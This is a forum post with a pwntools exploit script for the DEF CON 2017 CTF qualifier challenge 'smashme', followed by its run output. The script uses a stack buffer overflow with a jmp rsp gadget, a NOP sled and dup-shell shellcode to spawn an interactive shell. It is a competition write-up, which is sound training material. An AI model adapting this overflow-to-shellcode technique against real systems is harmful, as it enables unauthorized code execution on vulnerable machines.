Page 1 of 1

[DEF CON CTF Qualifier 2017] smashme

Posted: Mon May 01, 2017 8:17 pm
by amesianx

Code: Select all

from pwn import *

context(arch='amd64', os='linux')

elf = ELF('./smashme')
rop = ROP(elf)

#conn = remote('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
conn = process(['./smashme'])
print conn.recvuntil('Welcome to the Dr. Phil Show. Wanna smash?')
k = 'Smash me outside, how bout dAAAAAAAAAAA\0'
shellcode = asm(shellcraft.dupsh(4))
jmp_rsp = p64(elf.search(asm("jmp rsp")).next())
jmp = "\x90\x90\xeb\x16"
nop = "\x90"*60
conn.send(k.ljust(72, 'A') + jmp_rsp + jmp + nop + shellcode + '\n')
conn.interactive()

Code: Select all

root@e2837c6b25fd ~/CTF/defcon
# python ex.py
[*] '/root/CTF/defcon/smashme'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
[*] Loaded cached gadgets for './smashme'
[+] Starting local process './smashme': pid 9188
Welcome to the Dr. Phil Show. Wanna smash?

[*] Switching to interactive mode

$ ls -al
total 332324
drwxr-xr-x  9 1002 1002      4096 May  1 11:18 .
drwxr-xr-x 14 1002 1002      4096 Apr 29 14:52 ..

solve2.png
solve
solve2.png (250.94 KiB) Viewed 232 times